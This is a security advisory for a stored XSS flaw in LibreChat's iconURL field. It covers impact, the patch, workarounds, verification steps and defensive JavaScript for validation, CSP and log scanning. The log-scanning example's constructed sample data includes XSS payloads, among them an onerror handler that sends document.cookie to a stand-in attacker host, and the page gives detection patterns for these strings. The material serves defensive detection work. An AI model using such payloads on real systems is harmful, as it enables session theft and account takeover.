CVE-2025-66450
📋 TL;DR
CVE-2025-66450 is a stored cross-site scripting (XSS) vulnerability in LibreChat. An attacker who can set the iconURL parameter stores a script payload that runs in the browser of every user who opens the resulting shared chat link, within the LibreChat origin, exposing that viewer's session and privacy. LibreChat versions 0.8.0 and earlier are affected; 0.8.1 fixes it.
💻 Affected Systems
- LibreChat
📦 What is this software?
LibreChat, an open-source, self-hosted chat interface for LLM APIs, maintained by the LibreChat project at https://github.com/danny-avila/LibreChat.
⚠️ Risk & Real-World Impact
Worst Case
The injected script runs with the full privileges of page script on the LibreChat origin for any user who opens the malicious shared link. It can read whatever that script can reach (session tokens not protected by HttpOnly, data in local storage, API responses fetched with the victim's credentials), perform actions as the victim, or present a fake login prompt, potentially leading to account takeover or data exfiltration.
Likely Case
Privacy violation: the payload loads attacker-controlled resources or sends beacons, so the attacker learns who viewed the shared link, when, and from where (IP address, browser fingerprint, referrer and similar identifiers).
If Mitigated
With proper input validation (for example, accepting only well-formed http or https URLs for iconURL) and context-appropriate output encoding when the value is rendered, the payload is stored as inert text and never executes.
🎯 Exploit Status
Exploitation requires an account that can set the iconURL value (that is, create or modify chat content) and share the chat. No further interaction is needed from the victim beyond opening the shared link, and the payload is a conventional XSS string, so execution is straightforward once stored.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 0.8.1
Vendor Advisory: https://github.com/danny-avila/LibreChat/security/advisories/GHSA-84vx-vmcf-xgpp
Restart Required: Yes
Instructions:
1. Back up your current installation (database and configuration).
2. Update to LibreChat version 0.8.1 or later.
3. Restart the LibreChat service.
4. Verify the fix is applied (see How to Verify below).
🔧 Temporary Workarounds
Input Validation Filter
Implement server-side validation of the iconURL parameter: accept only well-formed absolute http(s) URLs and reject everything else (javascript:, data: and vbscript: schemes, HTML metacharacters, embedded credentials). Validate the decoded, normalized value, not a raw substring match, so case and encoding tricks do not slip through.
Content Security Policy
Serve a strict Content-Security-Policy header (script-src limited to 'self' plus a per-response nonce, no 'unsafe-inline', object-src 'none') so injected inline script is not executed. Treat CSP as defense in depth only: it does not remove the stored payload, and it does not stop a tracking image from loading unless img-src is restricted as well.
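The two workarounds above (server-side allowlisting of iconURL, then encoding it on output, plus a nonce-based CSP) as one worked example. This is added illustration code, not LibreChat's own implementation: the field name iconURL comes from the advisory, but the maximum length, the fallback icon path, the plain-string `<img>` rendering and the CSP directive set are assumptions for the example. Generate the nonce per response with a CSPRNG (for example `crypto.randomBytes(16).toString('base64')` in Node) and pass it in.

```javascript
// Added example (not LibreChat code): allowlist + encode + CSP for an iconURL value.
// Assumed values: length cap, fallback icon path, rendering shape, CSP directives.
const MAX_ICON_URL_LENGTH = 2048;                    // assumed cap
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);
const DEFAULT_ICON = '/assets/default-icon.png';     // assumed fallback path

// Returns a normalized URL string safe to store, or null if the value must be rejected.
// The WHATWG URL parser lower-cases the scheme and strips embedded tab/CR/LF, so
// "jAvAsCrIpT:" and "java\nscript:" both parse with protocol "javascript:" and
// are refused by the scheme allowlist; relative or malformed input throws.
function validateIconUrl(value, { allowedHosts = null } = {}) {
  if (typeof value !== 'string' || value.length === 0 || value.length > MAX_ICON_URL_LENGTH) {
    return null;
  }
  let parsed;
  try {
    parsed = new URL(value);
  } catch {
    return null;
  }
  if (!ALLOWED_SCHEMES.has(parsed.protocol)) return null;
  if (parsed.username || parsed.password) return null;       // no embedded credentials
  if (allowedHosts && !allowedHosts.has(parsed.hostname)) return null;
  return parsed.href;
}

// Encodes a string for the inside of a double-quoted HTML attribute.
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Renders the icon for a shared-chat view. A rejected value is replaced by the
// fixed fallback rather than echoed back in any form.
function renderIcon(iconUrl) {
  const safe = validateIconUrl(iconUrl) ?? DEFAULT_ICON;
  return `<img class="icon" src="${escapeAttr(safe)}" alt="">`;
}

// Builds a per-response Content-Security-Policy value. `nonce` must be fresh per
// response and attached to legitimate inline scripts as nonce="...". imageHosts
// should mirror the hosts accepted by validateIconUrl so valid icons still load.
function buildCsp(nonce, { imageHosts = ["'self'"] } = {}) {
  return [
    "default-src 'self'",
    `script-src 'self' 'nonce-${nonce}'`,
    `img-src ${imageHosts.join(' ')}`,
    "object-src 'none'",
    "base-uri 'self'",
    "frame-ancestors 'none'",
  ].join('; ');
}

module.exports = { validateIconUrl, escapeAttr, renderIcon, buildCsp };
```

Note the ordering: validation happens once, at write time, so a bad value never reaches storage; encoding happens at every render, so even a value that somehow reached storage cannot break out of the attribute; CSP catches what the first two miss. If your deployment serves icons from relative asset paths, extend the validator with an explicit allowlist of those paths rather than relaxing the scheme check.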
🧯 If You Can't Patch
- Disable chat sharing functionality entirely
- Implement web application firewall (WAF) rules that inspect the URL-decoded iconURL value and block anything that is not an http(s) URL (javascript:, data:, vbscript: schemes) or that contains HTML metacharacters or on*= attribute patterns; a WAF is a stopgap that attackers can often bypass with encoding, not a substitute for the patch
🔍 How to Verify
Check if Vulnerable:
Any LibreChat instance running version 0.8.0 or earlier is vulnerable. To confirm on a non-production copy, create a chat whose iconURL is a harmless marker payload (for example a javascript: URL that only logs to the console), share it, and open the shared link in a fresh browser profile to see whether the marker executes.
Check Version:
Check the version field in the package.json of the deployed checkout, or the image tag if running from Docker, or run: npm list @librechat/core
Verify Fix Applied:
After updating to 0.8.1 or later, repeat the same harmless iconURL test on a non-production copy and confirm the value is rejected at submission or rendered as inert text on the shared link, with no script execution. Also re-check any chats shared before the update, since the stored payload is not removed by upgrading the code.
📡 Detection & Monitoring
Log Indicators:
- Unusual iconURL parameter values containing script tags or JavaScript code
- Multiple failed validation attempts on iconURL parameter
Network Indicators:
- HTTP POST requests with suspicious iconURL parameter values
- External resource loading from unexpected domains in chat views
SIEM Query:
source="librechat" AND (iconURL CONTAINS "<script>" OR iconURL CONTAINS "javascript:")
This is pseudo-syntax to adapt to your SIEM. Match case-insensitively on the URL-decoded value and extend the pattern list with data:, vbscript: and on*= attribute handlers, because a literal, lowercase match on "<script>" and "javascript:" misses trivial variants.
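The log indicators above, run over a handful of sample lines, as an added example; this is not LibreChat's own logging or any real log data. The log shape (one JSON object per line with an iconURL field somewhere inside it) is assumed, and the sample lines are constructed for the example. It goes beyond the literal SIEM query by decoding URL-encoding first and normalising case and whitespace in the scheme, which is what makes the obvious evasions visible.

```javascript
// Added example (not LibreChat code or logs): scan JSON log lines for suspicious
// iconURL values. Log format and sample lines are assumed/constructed.
const DANGEROUS_SCHEMES = ['javascript:', 'data:', 'vbscript:'];

// Undo URL-encoding repeatedly (double-encoding is a common way past naive
// substring matches); stop when the value stops changing or decoding fails.
function fullyDecode(value, maxRounds = 3) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(current); } catch { break; }
    if (next === current) break;
    current = next;
  }
  return current;
}

// Returns the indicator names that fire for one iconURL value (empty if clean).
function classifyIconUrl(value) {
  const reasons = [];
  const decoded = fullyDecode(String(value));
  if (decoded !== value) reasons.push('url-encoded');
  // Browsers ignore tab/CR/LF inside a scheme and compare it case-insensitively,
  // so normalise the same way before checking the scheme.
  const normalised = decoded.replace(/[\t\r\n]/g, '').trimStart().toLowerCase();
  if (DANGEROUS_SCHEMES.some((s) => normalised.startsWith(s))) reasons.push('dangerous-scheme');
  if (/[<>"']/.test(decoded)) reasons.push('html-metachar');
  if (/\bon[a-z]+\s*=/i.test(decoded)) reasons.push('event-handler');
  return reasons;
}

// Depth-first search for every string-valued key named iconURL in a log entry.
function findIconUrls(obj, out = []) {
  if (obj && typeof obj === 'object') {
    for (const [k, v] of Object.entries(obj)) {
      if (k === 'iconURL' && typeof v === 'string') out.push(v);
      else findIconUrls(v, out);
    }
  }
  return out;
}

// Scans newline-separated JSON log lines; returns one finding per suspicious value.
// Unparsable lines are skipped rather than aborting the scan.
function scanLogLines(text) {
  const findings = [];
  text.split('\n').forEach((line, idx) => {
    if (!line.trim()) return;
    let entry;
    try { entry = JSON.parse(line); } catch { return; }
    for (const value of findIconUrls(entry)) {
      const reasons = classifyIconUrl(value);
      if (reasons.length) findings.push({ line: idx + 1, value, reasons });
    }
  });
  return findings;
}

// Constructed sample log (not real LibreChat output): one benign line, four
// variants of an injection attempt, and one non-JSON line.
const SAMPLE_LOG = [
  { ts: '2025-12-01T10:00:00Z', method: 'POST', path: '/api/share', body: { iconURL: 'https://cdn.example.com/bot.png' } },
  { ts: '2025-12-01T10:00:05Z', method: 'POST', path: '/api/share', body: { iconURL: 'javascript:alert(1)' } },
  { ts: '2025-12-01T10:00:09Z', method: 'POST', path: '/api/share', body: { iconURL: '%6A%61vascript%3Aalert(1)' } },
  { ts: '2025-12-01T10:00:12Z', method: 'POST', path: '/api/share', body: { iconURL: 'https://x/a.png" onerror="fetch(\'https://evil.example/?c=\'+document.cookie)' } },
  { ts: '2025-12-01T10:00:15Z', method: 'POST', path: '/api/share', body: { iconURL: 'Java\tScript:alert(1)' } },
].map((e) => JSON.stringify(e)).concat(['not json at all']).join('\n');

module.exports = { fullyDecode, classifyIconUrl, findIconUrls, scanLogLines, SAMPLE_LOG };
```

The scan flags lines 2 to 5 and leaves the benign line alone; the URL-encoded and tab-split variants are exactly the ones the literal SIEM query above would miss. Feed the same classifier to a saved-search or alert rule rather than the raw substring match once you have confirmed its false-positive rate on your own traffic.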